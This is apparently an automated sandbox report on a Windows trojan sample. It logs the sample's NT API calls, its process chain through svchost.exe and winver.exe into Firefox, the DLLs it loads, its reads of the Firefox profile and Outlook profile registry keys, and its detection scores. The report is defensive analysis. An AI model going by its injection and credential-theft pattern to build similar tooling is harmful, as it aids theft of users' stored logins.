                Source: z6tNjJC614.exe, 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_bc716f9e-9
                Source: z6tNjJC614.exe | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_e2f9f6aa-c
                Source: z6tNjJC614.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_402d90a3-a
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0042C9F3 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040AA5D NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_039735C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03974340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03974650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972C70 NtFreeVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03972C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03973090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03973010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_039739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03973D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03973D70 NtOpenThread
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04524650 NtSuspendThread,LdrInitializeThunk,12_2_04524650
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04524340 NtSetContextThread,LdrInitializeThunk,12_2_04524340
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04522C70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522C60 NtCreateKey,LdrInitializeThunk,12_2_04522C60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04522CA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04522D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04522D30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522DD0 NtDelayExecution,LdrInitializeThunk,12_2_04522DD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04522DF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04522EE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04522E80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522F30 NtCreateSection,LdrInitializeThunk,12_2_04522F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522FE0 NtCreateFile,LdrInitializeThunk,12_2_04522FE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522FB0 NtResumeThread,LdrInitializeThunk,12_2_04522FB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522AD0 NtReadFile,LdrInitializeThunk,12_2_04522AD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522AF0 NtWriteFile,LdrInitializeThunk,12_2_04522AF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522B60 NtClose,LdrInitializeThunk,12_2_04522B60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04522BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04522BE0
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_045235C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_045239B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04522B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04523010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04523090 NtSetValueKey
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04523D70 NtOpenThread
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_04523D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_004B9310 NtCreateFile
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_004B9480 NtReadFile
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_004B9570 NtDeleteFile
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_004B9610 NtClose
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_004B9780 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00568310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_005751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 0455EA12 appears 86 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04525130 appears 58 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 0456F290 appears 105 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 044DB970 appears 277 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 04537E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: String function: 00530AE3 appears 70 times
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: String function: 00517DE1 appears 36 times
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: String function: 00538900 appears 42 times
                Source: z6tNjJC614.exe, 00000000.00000003.1299556459.0000000003A0D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs z6tNjJC614.exe
                Source: z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003863000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs z6tNjJC614.exe
                Source: z6tNjJC614.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@11/9
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057A06A GetLastError,FormatMessageW, 0_2_0057A06A
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_005681CB AdjustTokenPrivileges,CloseHandle, 0_2_005681CB
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_005687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_005687E1
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0057B333
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0058EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0058EE0D
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057C397 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0057C397
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00514E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00514E89
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | File created: C:\Users\user~1\AppData\Local\Temp\aut37ED.tmp
                Source: z6tNjJC614.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: winver.exe, 0000000C.00000003.1871694641.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1877684652.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3125210313.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1871694641.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3125210313.0000000000819000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3125210313.00000000007C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: z6tNjJC614.exe | ReversingLabs: Detection: 83%
                Source: z6tNjJC614.exe | Virustotal: Detection: 66%
                Source: unknown | Process created: C:\Users\user\Desktop\z6tNjJC614.exe "C:\Users\user\Desktop\z6tNjJC614.exe"
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z6tNjJC614.exe"
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z6tNjJC614.exe"
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Section loaded: ntmarta.dll
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\winver.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\winver.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\winver.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: z6tNjJC614.exe | Static file information: File size 1225216 > 1048576
                Source: z6tNjJC614.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: z6tNjJC614.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: z6tNjJC614.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: z6tNjJC614.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: z6tNjJC614.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: z6tNjJC614.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: z6tNjJC614.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winver.pdb source: svchost.exe, 00000008.00000003.1603996002.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1603347613.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000003.1707352600.0000000000DAF000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tFEgkRNveR.exe, 0000000B.00000002.3124395582.000000000017E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: z6tNjJC614.exe, 00000000.00000003.1297611024.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1538115679.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1536377388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1635461967.0000000004154000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.000000000464E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1638229083.0000000004304000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: z6tNjJC614.exe, 00000000.00000003.1297611024.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000003.1538115679.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1536377388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, winver.exe, 0000000C.00000002.3128325549.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1635461967.0000000004154000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.000000000464E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1638229083.0000000004304000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000008.00000003.1603996002.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1603347613.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000003.1707352600.0000000000DAF000.00000004.00000001.00020000.00000000.sdmp
                Source: z6tNjJC614.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: z6tNjJC614.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: z6tNjJC614.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: z6tNjJC614.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: z6tNjJC614.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00514B37 LoadLibraryA,GetProcAddress, 0_2_00514B37
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0051C4C6 push A30051BAh; retn 0051h 0_2_0051C50D
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00538945 push ecx; ret 0_2_00538958
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00411948 push ss; retf 8_2_0041194E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040214C pushad ; retf 8_2_0040214D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00416AAC push esp; retf 8_2_00416AAD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00413B33 pushfd ; ret 8_2_00413B79
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004033E0 push eax; ret 8_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004144FC push edi; retf 8_2_004144FE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00415D23 push 00000009h; retn 3081h 8_2_00415DC4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00408695 push edx; retf 8_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004086AF push edx; retf 8_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0390225F pushad ; ret 8_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_039027FA pushad ; ret 8_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_039309AD push ecx; mov dword ptr [esp], ecx 8_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0390283D push eax; iretd 8_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03901368 push eax; iretd 8_2_03901369
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_052074D0 push esp; retf 11_2_052074D1
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_0521003E push eax; iretd 11_2_0521003F
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_05210063 push esp; retf 11_2_0521006C
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_051F90B9 push edx; retf 11_2_051F90D2
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_051F90D3 push edx; retf 11_2_051F90D2
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_0520236C push ss; retf 11_2_05202372
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_05206A1C push eax; retf 11_2_05206A1D
